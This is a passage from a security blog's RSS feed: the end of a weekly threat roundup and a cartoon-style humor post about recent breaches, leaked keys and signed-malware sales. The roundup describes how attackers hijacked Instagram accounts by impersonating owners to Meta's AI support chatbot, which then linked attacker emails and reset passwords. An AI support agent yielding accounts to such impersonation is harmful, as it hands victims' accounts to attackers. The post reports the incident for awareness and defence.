coins in proving soundness without compromising confidentiality.</p><p><strong>Key Takeaway for Users/Dev Teams</strong>: Traditional audits are insufficient in complex cryptographic systems. Organizations should integrate advanced AI-assisted verification tools proactively. For Zcash holders and similar projects, this serves as a stark reminder of supply integrity risks in DeFi and privacy tech.</p><h3>Instagram/Meta AI Support Chatbot Exploited for Account Takeovers</h3><p>Hackers have been successfully hijacking Instagram accounts&#8212;including high-profile ones&#8212;by tricking Meta&#8217;s AI-powered support chatbot into linking attacker-controlled emails and resetting passwords. The simple prompt-based attack (e.g., impersonating the account owner and requesting an email link change) bypassed normal safeguards in some cases, even affecting accounts with 2FA.</p><p>Reports emerged around late May/early June 2026, with examples including defacements of accounts tied to the Obama White House and U.S. Space Force (pro-Iran messages in some cases). Victims lost access to prized handles and content, with some facing permanent issues under Meta&#8217;s policies. Meta acknowledged the flaw, issued a patch around June 1-2, and began alerting affected users, though complaints about incomplete fixes persisted.</p><p><strong>How It Worked</strong>: Attackers often used VPNs to match target locations and interacted with the AI bot, which offloaded technical support decisions. This highlights the risks of relying heavily on generative AI for user authentication and recovery flows without robust human oversight or verification layers.</p><p><strong>Key Takeaway</strong>: Enable strong 2FA (app-based, not SMS-only), avoid sharing codes, monitor for suspicious recovery attempts, and treat AI support interactions with skepticism. This incident is a wake-up call for platforms integrating AI chatbots into sensitive account management.</p><h3>Ongoing Supply Chain and Vulnerability Exploitation Trends (npm Attacks, Magento, Cisco, etc.)</h3><p>Beyond the headline cases, discussions highlighted persistent supply chain risks and unpatched vulnerabilities. Examples include compromises of npm packages (e.g., under Red Hat namespaces delivering Miasma malware or IronWorm for secret theft), active attacks on Magento stores via cache extensions, urgent patches needed for Cisco phone systems, and broader shifts where vulnerability exploitation has overtaken stolen credentials as the top initial access vector.</p><p>AI is playing a bigger role in both defenses (e.g., tools like SEC-AF for exploitability analysis) and threats, with ransomware prep speeding up. Enterprise risks also include health data exposures (e.g., DentaQuest) and supply chain pressures in AI hardware.</p><p><strong>Key Takeaway</strong>: Prioritize patching, vet third-party dependencies/code (use tools for provenance scanning), and adopt zero-trust principles. Vendor and open-source supply chain security is now table stakes, especially with AI accelerating attack timelines.</p><p>These quick hits reflect a dynamic threat landscape where AI is a double-edged sword, supply chains remain fragile, and user-facing AI features introduce novel risks. Stay vigilant, patch promptly, and monitor official sources for updates. For the latest, follow credible cybersecurity accounts and enable multi-layered protections.</p><p><em>This post is based on publicly discussed issues as of June 6, 2026. Cybersecurity evolves rapidly&#8212;verify details independently.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Rod's Saturday Funnies: June 6, 2026 Edition - Your weekly dose of cybersecurity chaos, served with a side of slapstick and zero-day whoopee cushions!]]></title><description><![CDATA[Cereal and cartoons and security. Remote optional.]]></description><link>https://rodtrent.substack.com/p/rods-saturday-funnies-june-6-2026</link><guid isPermaLink="false">https://rodtrent.substack.com/p/rods-saturday-funnies-june-6-2026</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Sat, 06 Jun 2026 13:30:33 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!XKjN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XKjN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XKjN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XKjN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:302389,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!XKjN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!XKjN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc3e3b9aa-0ba5-4b74-88ba-07d1df1bf538_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Howdy, folks! It&#8217;s your pal Rod here, reporting live from the digital clown car that is the internet in 2026. Grab your popcorn, your multi-factor whoopee cushion, and maybe a fresh pair of pants&#8212;because this week&#8217;s security news is wilder than a hacker trying to log into Grandma&#8217;s Wi-Fi with &#8220;password123.&#8221; We&#8217;re turning the week&#8217;s biggest headaches into cartoon capers. Lights, camera, <em>pwn</em>!</p><h3>&#8220;CISA&#8217;s Public GitHub Oopsie&#8221;</h3><p>Picture this: The Cybersecurity and Infrastructure Security Agency&#8212;<em>the</em> folks who are supposed to audit <em>your</em> security&#8212;has a contractor treating a public GitHub repo like a personal Dropbox between work laptop and home computer. For <strong>six whole months</strong>! Keys just hanging out there like laundry on a line in a bad neighborhood.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>In cartoon form: Imagine Elmer Fudd as the contractor, whispering, &#8220;Be vewy, vewy quiet... I&#8217;m hunting secuwity keys!&#8221; Meanwhile, Bugs Bunny (the hacker) strolls by, grabs the keys, and turns the whole thing into a ACME exploding rocket show. Moral of the story? Even the watchmen need better locks. Or at least a private repo. Classic self-own!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!W70C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!W70C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!W70C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!W70C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!W70C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!W70C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:457607,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!W70C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!W70C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!W70C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!W70C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2db64785-69d6-41d8-8803-7e3302388269_1168x784.jpeg 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>&#8220;Fox Tempest&#8217;s Evil eBay&#8221;</h3><p>Next up, the dastardly Fox Tempest crew was out here selling <strong>Microsoft-signed malware certificates</strong> for a cool $5,000 a pop. Legit-looking signatures on nasty code&#8212;like putting a tuxedo on a raccoon and calling it &#8220;formal wear.&#8221;</p><p>Visualize Wile E. Coyote finally getting his hands on genuine Road Runner-brand rocket fuel. &#8220;This time, it&#8217;s signed by the big cheese himself!&#8221; Cut to the rocket exploding in his face anyway because, well, malware gonna malware. Attackers are basically running a dark web flea market: &#8220;Genuine certificates! Barely used! Slightly evil!&#8221;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CaXt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CaXt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 424w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 848w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CaXt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg" width="1360" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:1360,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:434871,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CaXt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 424w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 848w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!CaXt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5667d485-ba5a-4610-9ae4-2ee14ef6e993_1360x768.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>&#8220;ShinyHunters Strike Again (And Again...)&#8221;</h3><p>Those lovable rascals at ShinyHunters (and pals) had a busy May, hitting Instructure, Mediaworks, and who knows how many others. Plaza Home Mortgage spilled customer and employee data like a pi&#241;ata at a ransomware party.</p><p>Cartoon version: A gang of cartoon weasels in striped shirts and tiny masks cracking open company vaults with comically oversized crowbars labeled &#8220;Credential Stuffing.&#8221; One weasel turns to the camera: &#8220;They left the back door open... again!&#8221; Victims? Running around like headless chickens yelling, &#8220;Not the customer dataaaa!&#8221;</p><p>Honorable mentions in the breach-o-rama: Building automation systems getting ransomed (because who needs lights and HVAC when you can have existential dread?), and various misconfigs exposing passports, licenses, and more personal docs than a nosy neighbor&#8217;s filing cabinet.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!koHz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!koHz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!koHz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!koHz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!koHz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!koHz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:438103,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200748916?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!koHz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!koHz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!koHz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!koHz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ce0c08-fcd5-4910-9f5b-b13642c0d3fa_1168x784.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>&#8220;AI Goes Full Mad Scientist&#8221;</h3><p>AI is now helping build better malware <em>and</em> better defenses. Microsoft&#8217;s MDASH is pumping up the AI cyber arms race, while bad guys use it for EDR evasion tools. It&#8217;s like giving both the Road Runner <em>and</em> Wile E. Coyote super speed and rocket boots.</p><p>In our cartoon: A lab-coated genius AI (with glowing evil eyes) cackles, &#8220;With this, I&#8217;ll create the ultimate cat-and-mouse... but make the mouse <em>sentient</em>!&#8221; Cut to chaos where the mouse hacks back. The future is here, and it&#8217;s got better phishing lures than a cartoon fisherman with a dollar bill on a stick.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y_Gc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbded5822-0139-4c7b-ba60-bcbf42d0df13_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 